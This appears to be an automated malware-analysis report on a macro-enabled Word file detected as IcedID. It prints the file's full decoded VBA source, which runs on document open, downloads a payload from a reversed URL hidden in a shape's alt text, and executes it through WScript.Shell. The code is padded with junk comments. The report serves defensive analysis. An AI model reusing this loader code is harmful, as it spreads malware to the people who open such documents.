MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set yJPzr = CreateObject("Script" + sIqov) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12015 bytes |
SHA-256: 61fb52bbc2bf13e0ce16839137a0c2b77953e70984e13bd60899620734800d56 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UCgPC"
Sub xWHOS(kywbp, Optional ByVal ryWHh As String = "c:\programdata\pztNa.txt", Optional ByVal sIqov As String = "ing.FileSystemObject")
' Monomial cooperates hostilely
' Pitfall awkwardly conclusion plasm
' Florist worker
' Mullet aliening
' Resemble balmiest massages seeping postscripts
' Kloof zealots conurbations presence
' Pinning staccato luggage
' Feelings gazed dispirited replenish
' Loaves beating
' Ruminants nunnery ingoing mustard
' Mariner philology
' Gaoler schwa
Set yJPzr = CreateObject("Script" + sIqov)
' Obsolescent ballyhoo accusations
' Wrongly
' Holds stumbles finches impales
' Jeopardy arab payday
' Impassively virtually waited ails
' Earldoms wirings
' Fringy forbidden manors option
Set DPRgR = yJPzr.CreateTextFile(ryWHh)
' Fatwa girl inductance
' Kickstarted platen glaciology quenches chestnut hussies
' Roundels tormented
' Streaks mexican ouch
' Daintier phonograph
' Extrinsically dietician
' Convenors surely regression air screening
DPRgR.WriteLine kywbp
' Blueprint evoked extract endlessness defused
' Phonographic tyrannous corroborative sonorous
' Adieus sunlight
' Coincided task cortical
' Memphis falsifying gobbledegook roentgen rippers recouple flagships
DPRgR.Close
' Affronts strongroom decider spurns illhumoured robustness accursed
' Positioning
' Deficit hypnotism
' Abducting smothered
' Markers chain vanities treachery
' Colouration visually embezzling mandate
' Untapped retrain
' Merchants particulates veil luckier lampooned bourgeois
' Miler cogitated
' Reforms contributes relegating educationalist raft
' Surrounded hostelries
' Reverentially hugeness nourish initialisation
' Fowl fruitcakes unadulterated
' Doggy logician singlehanded clipboards
' Sprayer celestial ineffectually deities restlessly teds
' Sedates hackneyed
' Misplaces ace attrition
' Fanned redress collimation atrociously
' Messengers optimality screechiest selfcontrolled nodded
' Posthumously
' Denizens
' Abbey actuated juxtaposes grating
' Leases
' Anticipated missing
' Naiads sprawls hundreds smoulder whether
' Surveyor cheated pompeii
' Enunciation capacitive dilute
' Predefine asymmetric toppling pumps brass
' Honors
' Decrying clenching stripiest razorblades
' Microscopist augments zoom repudiating reimbursing psycholinguistics
' Emotive quovadis maseru changeless
' Riling vernier mine
' Mastodons lonely
' Sideshows liquify basses
' Exhaustive plops malignancy glamour
' Narrower pussy polytopes unmentionables
' Baud
' Marker placentae
' Alabaster
' Unbearably laterally solids
End Sub
' Sonority docs
' Streamlines quibbling evaporating
' Peeper chats unblemished theoretically rapt trilateral
' Jeopardising composedly absolutes wounds
Sub AutoOpen()
' Original dismissive unfledged
' Collaterally
' Ember meteoric summoner browses
' Bisexuality demystification
' Nun zipping
' Preclude latch
' Accusingly narrators
' Absolving timbre
' Marvellously
' Endanger stockbroker
' Thimble systoles
' Pluses intercepted
' Augmentations inner newscasters
' Recoups misidentification patrols insignificantly
' Triplex navigated usurer
' Burly ridiculing
' Mitigates munich nameplates schoolboys cajole toughest
' Massless barrelled hottempered inroad perchlorate chortling headier
' Irreproachable equalised scholarship
' Indifference contestable earthlings fries bunched
' Physiologically rodents excelsior
' Refreshed ovens roofing liveliest excluded
' Plimsolls interferon
' Recheck pouffes primogeniture comedian
' Proclaim deficient
' Costeffectiveness unexploited delusion
Dim JfqEc As New njGZm
' Swelling
' Interconnection regatta borrowings assort
' Paralysed snobbery
' Prefaces
kywbp = JfqEc.JnbRr("MSXML2.serverXMLHTTP")
' Inclusions unconvincing wiles dipped
' Hepatitis haughty integrations shadeless
' Trudges
' Tapping breathless influenza
' Grip eroding peacefulness impelled directionality
' Ethicist impales antiseptic
xWHOS ZfFJa(kywbp)
' Waif addition
' Sexed snubs mechanistic stiffly gobi
' Tug
' Aerodynamics comprehensibility frequency astrophysicists
' Dusters halfhearted jolting callowness decadent
' Tailspin canopy
' Limelight wool furred impeded pressups conditionally
' Regurgitate outlooks marquess bastard
' Horror presidency
UiQiN hTTUU(0) + "vr32 c:\programdata\pztNa.txt", "ws"
End Sub
Function vaCEk(HQFhs, MRRid)
' Aura outlived purposelessly
' Congressmen updated obelisks
' Bestial pretty hoodwink rarefied
' Keenest avenue interweaving denude
' Actualisation irritation reappraising
' Differential buttocks amorously oxtails wanting promontories
vaCEk = Split(HQFhs, MRRid)
End Function
Attribute VB_Name = "HYRQB"
' Ennoble reigns familiarise
' Strengths finisher survival colourful
' Concisely rankest
' Furling squiggles roasted
' Sportsmanship moderating midas unfrequented planter encroach squid silliness
Function ZfFJa(wTiOv)
' Revolving speared ample
' Propulsion reducers
' Stoke condemnations treatises untethered
' Provincialism camels airport flee cryptanalysis
' Biography codes
ZfFJa = StrConv(wTiOv, vbUnicode)
' Glimpsed radii digitised wed grilling roughens
' Curiosities denser ethology armhole
' Legal averted
' Dowel
' Folklore halftruth ranted
End Function
' Chores
' Guillotines
' Tauntingly finance facade
' Drivel seize snowy incriminated
' Pentagrams slushes tussle italicised
' Hotrod nutritionist scornfully infantrymen substrata
Function LCOFb()
' Makeover animation uncircumcised
' Instructive desired interceptors capstan
' Espousal alterations
' Evacuee fizzles
' Forerunners
' Mystification clubfooted ides
' Quiveringly passmark
' Fathersinlaw straggling inoculations
' Utilities
' Rickshas retinas
With ActiveDocument.shapes(1)
LCOFb = .AlternativeText
End With
End Function
' Horridly sequins herbalists underlay
' Afghans compound
' Hiking enounced idolaters
' Assassinating reimplementing negotiated necked breakdown
' Gorse oolitic rearms petitions customer
' Lire wellreceived
' Primeness fobbing
Function hTTUU(DPahG)
' Normalisations glint
' Depreciating
' Sequel kindergartens
' Osprey shinbone tickling dreariness cognates
' Premeditated amateurish matures frivol
' Extinctions
' Bandwagon stenography early
' Roarer goodies tobacconists persecutions desecrate dioptres
' Exchangers surface brightens sympathised
' Curves emanate battened
' Welladjusted wilt wildlife
TFtap = LCOFb()
exSMS = vaCEk(TFtap, "###")
qsnEd = exSMS(DPahG)
hTTUU = qsnEd
End Function
Attribute VB_Name = "njGZm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Omnipotence funny middleage chances quickening
' Plummeting sponginess
' Utility cheeriest allotropic crashers
' Moles claustrophobia tweet franked lucidly
' Cuddliest rissole click
' Crowds
' Achievements ingrate gumtrees lizards
Function JnbRr(gIbIK)
' Hangup gravedigger forefather stoic circumscribed
' Sidelight contexts
' Continually
' Avert chains cited
Dim hagRa As Object
' Workable
' Dozed function metropolitan
' Smut tend guava spawns
' Commutator guessing skippers checkout buckled
' Frugally delta unhesitating
' Melting
' Annihilation
' Raining begets
' Tipoff overpaid mull caretaker
' Perigee stodgier
Set hagRa = CreateObject(gIbIK)
' Novice triumphs phenotype chaos
' Porcupine promenades pilaster
' Igniter vowels joyriding
' Teeing
' Anecdote
' Clairvoyance
' Macro chafed scrape gleefully epistemic
' Proclaimers boutiques unadvertised particularity
' Toughest
' Progression unreadability adenine
' Overcast presenting higgledypiggledy
' Linkages enzymatic unhappiness
' Amphetamine
' Secularism detaches interjected speared
' Midfield regress
' Foresail bloodthirstiest architecturally mailorder
' Traceless doubletalk quasilinear stymie success sweating
' Bothering hydroelectric shrieker
' Starfish outbids hoes deer
' Blocking flapper ranching
' Redistributions allocation creepers
' Blinded saturates desorption downright cryogenics undisputed prefabrication
bemkM = hTTUU(1)
' Acrylics temperaments recall sceptically frictions
' Immense arrogantly
' Edginess contractor pressurises yemen incompatibility
' Distracting misspelt codicils
' Seamstresses discharges unshakeable dor
' Mistranslates blood indissoluble
hagRa.Open "GET", Reverse(bemkM), False
' Serpentine decoke modernising transferral
' Bookie clockmaker
' Rioted ability
' Cordage purporting capability howled devalued
' Stupidly fringe litotes liveliness
' Grumpiest leaven
' Alkalise batten
hagRa.Send
' Occasionally histamine calico venture
' Mayoralty harassers chronicled rem
' Seal underwriting
' Bowls wireless dahomey russian beadle dissimulation attitudes
' Boreal blobs preface stroke
' Adagio popularity
JnbRr = hagRa.responsebody
End Function
Attribute VB_Name = "FROCO"
Sub UiQiN(hxXEo, BjJKh)
' Camping douse psychiatrist
' Sprains
' Inorganic
' Centrifuges solenoid complainingly
Set XJLXs = CreateObject(BjJKh + "cript.shell")
' Yawn freaky logged corrupt
' Urticaria break citadel
' Particularism welcomer referenda aggregates socialist regains
' Proposing relocked unicameral contiguity retorted
' Broadmindedness hilt vocalising loanword
' Achingly
' Chilean hydrochloric apprenticeship
' Disregard humankind
' Observations bindery
' Monologues interrogatives netting scouting
' Patricians degeneracies tolerances tendons
' Worldly enveloper
' Blinkered psychotherapy loaned drama
' Neutrino traceless replenish guiders
' Throttled carvings theology additions
' Hairpiece literally percept
' Babysit overhangs pseudonymous commonlaw circularise
' Plutonium reformulates
' Benefice duds jargons mistakenly yogi
' Rudely
' Spook protractors market
' Wisecracks lees monomers
' Debriefing stuffed boundless
' Sharpeners presides crumbs switched shutter gapingly
' Outsiders offences transportation tram aggregates
' Cogent yard tasting jetpropelled
' Shirts interlap mattering
' Phrasebook
' Controversial suitably gut flame vandalised upheavals dryers
' Consonants football hotspots hydroelectric dramatists
' Significances genoa
' Vampire readiness bulldozed unaesthetic satirising
' Impossible jailer widget situate coughs acrylics
' Microdot roundel valiant
' Gale smothers faxed
' Remnants underground
' Diplomacy depolarisation
' Custodians keen undiscriminated
' Royalists innovator federated frivolity jelly concedes
' Livens intergovernmental asymptotes
' Blankets legalities dowdiest omnibuses average
' Nomadic feels victory
' Unassertive sponsors
' Quieting realignments unborn
' Strawberry fetches tribally
' Dramatised invalided
' Sputter burger compelled poplar convinced sculleries
' Playmate cinder trashy quantise fizzles
' Corporeal brunet pectin suzerainty remnants
' Tasters rheological typesets evasive
' Tripled fledged clearings electing
' Roistering
XJLXs.exec hxXEo
' Landlocked noduled headed unfirm
' Tucked ploughshare
' Boosters sailor protactinium
' Lapdog accredits interrogate nymph
' Boardgames methyl handcuffing
' Shuddering kinds nauseating allege seafarers suspicions
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 45056 bytes |
SHA-256: 9e65f2dbf49676076639540c5ed56ae4c6b088b0661dc4b8879280f35605b42a |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.